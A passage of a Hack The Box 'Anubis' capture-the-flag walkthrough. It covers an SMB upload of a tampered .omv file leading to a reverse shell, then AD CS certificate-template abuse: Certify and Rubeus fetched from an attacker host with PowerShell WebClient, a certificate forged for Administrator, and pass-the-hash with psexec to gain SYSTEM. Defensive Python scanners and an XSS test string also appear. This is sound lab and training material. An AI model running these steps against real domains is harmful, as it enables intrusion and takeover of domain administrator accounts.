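            yield from iter_strings(value, f"{path}[{i}]")
    elif isinstance(obj, str):
        yield path, obj


def scan_omv_bytes(data):
    """Scan every JSON member of an .omv (zip) archive; return (member, json_path, pattern) hits."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for member in zf.namelist():
            if not member.lower().endswith(".json"):
                continue
            try:
                doc = json.loads(zf.read(member).decode("utf-8"))
            except (ValueError, UnicodeDecodeError):
                findings.append((member, "$", "unparseable JSON"))
                continue
            for path, text in iter_strings(doc):
                for rx in SUSPICIOUS:
                    if rx.search(text):
                        findings.append((member, path, rx.pattern))
                        break  # one finding per string is enough
    return findings


def scan_omv_file(path):
    with open(path, "rb") as fh:
        return scan_omv_bytes(fh.read())


def make_omv(column_names):
    """Constructed minimal .omv (member names as in the unzip listing; metadata layout assumed)."""
    meta = {"dataSet": {"rowCount": 3, "columnCount": len(column_names),
                        "fields": [{"name": n, "id": i, "columnType": "Data", "dataType": "Integer"}
                                   for i, n in enumerate(column_names)]}}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("index.html", "<html><body></body></html>")
        zf.writestr("metadata.json", json.dumps(meta))
        zf.writestr("xdata.json", json.dumps({}))
        zf.writestr("data.bin", bytes(12 * len(column_names)))
    return buf.getvalue()


if __name__ == "__main__":
    print("clean:", scan_omv_bytes(make_omv(["age", "score"])))
    print("tampered:", scan_omv_bytes(make_omv(["age", "<script>alert(1)</script>"])))
```

Walking every string rather than only the `name` fields means the check still works if a future file version moves the column names elsewhere; the price is the occasional false positive on a label that legitimately mentions `require(`, which a reviewer can dismiss by hand.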

┌─[puck@parrot-lt]─[~/htb/anubis/omv]
└──╼ $smbclient //10.10.11.102/Shared -U windcorp.htb/localadmin Secret123
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Apr 28 17:06:06 2021
.. D 0 Wed Apr 28 17:06:06 2021
Documents D 0 Tue Apr 27 06:09:25 2021
Software D 0 Thu Jul 22 20:14:16 2021

9034239 blocks of size 4096. 3242014 blocks available
smb: \> cd Documents
smb: \Documents\> ls
. D 0 Tue Apr 27 06:09:25 2021
.. D 0 Tue Apr 27 06:09:25 2021
Analytics D 0 Tue Apr 27 20:40:20 2021

9034239 blocks of size 4096. 3242014 blocks available
smb: \Documents\> cd Analytics
smb: \Documents\Analytics\> ls
. D 0 Tue Apr 27 20:40:20 2021
.. D 0 Tue Apr 27 20:40:20 2021
Big 5.omv A 6455 Tue Apr 27 20:39:20 2021
Bugs.omv A 2897 Tue Apr 27 20:39:55 2021
Tooth Growth.omv A 2142 Tue Apr 27 20:40:20 2021
Whatif.omv A 2841 Thu Feb 24 13:00:07 2022

9034239 blocks of size 4096. 3242014 blocks available
smb: \Documents\Analytics\> put Whatif.omv
putting file Whatif.omv as \Documents\Analytics\Whatif.omv (11.1 kb/s) (average 11.1 kb/s)
smb: \Documents\Analytics\> put Whatif.omv
putting file Whatif.omv as \Documents\Analytics\Whatif.omv (2.0 kb/s) (average 2.0 kb/s)

Start your HTTP server to deliver the file and use netcat to catch the reverse shell.

PS C:\users\diegocruz> cd Desktop
PS C:\users\diegocruz\Desktop> type user.txt
8a298cdf7dc52a52a607b9f3912966ff

 

ROOT

If you noticed the CertEnroll share when we used smbclient: that folder is used by Active Directory Certificate Services for certificate enrollment.

Now let's use certutil -template to see which templates we have permission to enroll in.

 PS> certutil -template

  Template[31]:
  TemplatePropCommonName = Web
  TemplatePropFriendlyName = Web
  TemplatePropSecurityDescriptor = O:LAG:S-1-5-21-3510634497-171945951-3071966075-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3510634497-171945951-3071966075-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3510634497-171945951-3071966075-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;LA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3510634497-171945951-3071966075-3290)(A;;LCRPLORC;;;AU)

    Allow Enroll        WINDCORP\Domain Admins
    Allow Enroll        WINDCORP\Enterprise Admins
    Allow Full Control  WINDCORP\Domain Admins
    Allow Full Control  WINDCORP\Enterprise Admins
    Allow Full Control  WINDCORP\Administrator
    Allow Full Control  WINDCORP\webdevelopers
    Allow Read  NT AUTHORITY\Authenticated Users



USER INFORMATION
----------------

User Name          SID                                          
================== =============================================
windcorp\diegocruz S-1-5-21-3510634497-171945951-3071966075-3245


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes                                        
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only                          
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
WINDCORP\webdevelopers                     Group            S-1-5-21-3510634497-171945951-3071966075-3290 Mandatory group, Enabled by default, Enabled group



The user we have is a member of the webdevelopers group, so we can issue a certificate using the Web template.

After some searching I found a detailed article on this attack: Certified-Pre-Owned

We need to get Certify.exe to start our attack; you can find it here: CompiledBinaries
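The security descriptor certutil printed is where this misconfiguration lives: the ACE for S-1-5-21-...-3290 (webdevelopers, per the whoami output) grants CCDCLCSWRPWPDTLOCRSDRCWDWO, which certutil summarises as Full Control, to a group that is not an administrator. As an added example (not code from the original post or from Certify), the Python below parses that SDDL string and reports every non-privileged trustee holding enroll (CR scoped to the Certificate-Enrollment right, GUID 0e10c968-78fb-11d2-90d4-00c04f79dc55, or unscoped) or template-modifying rights (WP, WD, WO, SD), which is the check an AD CS audit runs across all templates. The SID-to-name mapping passed in is taken from the whoami output above; the set of privileged trustees is an assumption.

```python
import re

# Extended right that certutil maps to "Enroll" (the GUID shown in the template ACL above).
CERT_ENROLLMENT_GUID = "0e10c968-78fb-11d2-90d4-00c04f79dc55"

# SDDL trustee abbreviations and RIDs that are expected to control templates (assumed set).
PRIVILEGED_ABBREV = {"DA", "EA", "BA", "LA", "SY", "SA"}
PRIVILEGED_RIDS = {"500", "512", "518", "519"}  # Administrator, Domain Admins, Schema Admins, Enterprise Admins

# Rights that let a trustee enroll or change the template itself.
RIGHT_LABELS = {
    "CR": "control access (Enroll when the object GUID is the enrollment right or empty)",
    "WP": "write property (can edit template settings)",
    "WD": "write DACL",
    "WO": "write owner",
    "SD": "delete",
    "GA": "generic all",
    "GW": "generic write",
}
SENSITIVE = set(RIGHT_LABELS)

ACE_RX = re.compile(r"\(([^)]*)\)")

# The Web template descriptor from the certutil output above.
TEMPLATE_SDDL = (
    "O:LAG:S-1-5-21-3510634497-171945951-3071966075-519D:PAI"
    "(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)"
    "(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3510634497-171945951-3071966075-519)"
    "(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)"
    "(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3510634497-171945951-3071966075-519)"
    "(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;LA)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3510634497-171945951-3071966075-3290)"
    "(A;;LCRPLORC;;;AU)"
)
SID_NAMES = {"S-1-5-21-3510634497-171945951-3071966075-3290": "WINDCORP\\webdevelopers"}


def split_rights(rights):
    """SDDL rights are two-letter tokens (or a single hex mask); return the set of tokens."""
    if rights.startswith("0x"):
        return {rights}
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def is_privileged(trustee):
    if trustee in PRIVILEGED_ABBREV:
        return True
    return trustee.startswith("S-1-5-21-") and trustee.rsplit("-", 1)[-1] in PRIVILEGED_RIDS


def parse_sddl(sddl):
    """Return (owner, [ace dicts]); each ACE is type;flags;rights;object_guid;inherit_guid;trustee."""
    owner = re.search(r"O:([^:]+?)(?=G:|D:|S:|$)", sddl)
    aces = []
    for body in ACE_RX.findall(sddl):
        parts = body.split(";")
        if len(parts) < 6:
            continue
        ace_type, flags, rights, obj_guid, _inh_guid, trustee = parts[:6]
        aces.append({"type": ace_type, "flags": flags, "rights": split_rights(rights),
                     "object": obj_guid.lower(), "trustee": trustee})
    return (owner.group(1) if owner else None), aces


def audit_template_sddl(sddl, sid_names=None):
    """Map each non-privileged trustee to the sensitive rights its allow ACEs grant."""
    sid_names = sid_names or {}
    _owner, aces = parse_sddl(sddl)
    findings = {}
    for ace in aces:
        if ace["type"] not in ("A", "OA") or is_privileged(ace["trustee"]):
            continue
        risky = ace["rights"] & SENSITIVE
        if "CR" in risky and ace["object"] not in ("", CERT_ENROLLMENT_GUID):
            risky.discard("CR")  # CR scoped to some other extended right is not Enroll
        if not risky:
            continue
        name = sid_names.get(ace["trustee"], ace["trustee"])
        findings.setdefault(name, set()).update(risky)
    return {name: sorted(rights) for name, rights in findings.items()}


if __name__ == "__main__":
    for trustee, rights in audit_template_sddl(TEMPLATE_SDDL, SID_NAMES).items():
        print(trustee)
        for r in rights:
            print(f"  {r}: {RIGHT_LABELS[r]}")
```

Read-only trustees such as Authenticated Users (LCRPLORC) produce nothing, and the admin groups are skipped, so the only line reported is the one that matters. The remediation is the mirror image of the finding: remove write rights on the template from any group that is not meant to administer PKI, and keep Enroll scoped to the groups that need it.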

PS C:\Users\diegocruz\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.14.2/certify.exe','C:\users\diegocruz\Desktop\certify.exe')
PS C:\Users\diegocruz\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.14.2/rubeus.exe','C:\users\diegocruz\Desktop\rubeus.exe')
PS C:\Users\diegocruz\Desktop>

PS C:\Users\diegocruz\Desktop> .\certify.exe request /ca:earth.windcorp.htb\windcorp-CA /template:Web /altname:Administrator

   _____          _   _  __              
  / ____|        | | (_)/ _|             
 | |     ___ _ __| |_ _| |_ _   _        
 | |    / _ \ '__| __| |  _| | | |      
 | |___|  __/ |  | |_| | | | |_| |       
  \_____\___|_|   \__|_|_|  \__, |   
                             __/ |       
                            |___./        
  v1.0.0                               

[*] Action: Request a Certificates

[*] Current user context    : WINDCORP\diegocruz
[*] No subject name specified, using current context as subject.

[*] Template                : Web
[*] Subject                 : CN=Diego Cruz, OU=MainOffice, DC=windcorp, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : earth.windcorp.htb\windcorp-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 3

[*] cert.pem         :


Now copy the certificate from the victim machine, paste it into a file called cert.pem on your machine, and convert it using openssl.

└─# openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
┌──(root💀kali)-[/home/kali/HTB/anubis]
└─# ls     
cert.pem  cert.pfx  

Let's get our TGT.

.\rubeus.exe asktgt /user:Administrator /certificate:C:\users\diegocruz\desktop\cert.pfx


Export it to KRB:


DONE

┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $python3 psexec.py -hashes 3CCC18280610C6CA3156F995B5899E09:3CCC18280610C6CA3156F995B5899E09 administrator@10.10.11.102 cmd.exe
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.11.102.....
[*] Found writable share ADMIN$
[*] Uploading file cmOtbeVS.exe
[*] Opening SVCManager on 10.10.11.102.....
[*] Creating service zMsf on 10.10.11.102.....
[*] Starting service zMsf.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2114]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 77EB-C165

Directory of c:\Users\Administrator\Desktop

08/11/2021 12:54 PM <DIR> .
08/11/2021 12:54 PM <DIR> ..
02/24/2022 11:53 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 13,199,126,528 bytes free

c:\Users\Administrator\Desktop>type root.txt
38e[redacted]de3f

c:\Users\Administrator\Desktop>

References used:

Impersonating a Windows Enterprise Admin with a Certificate: Kerberos PKINIT from Linux

https://hackso.me/anubis-htb-walkthrough/

https://m19o.github.io/posts/Hackthebox-Anubis-Walkthrough/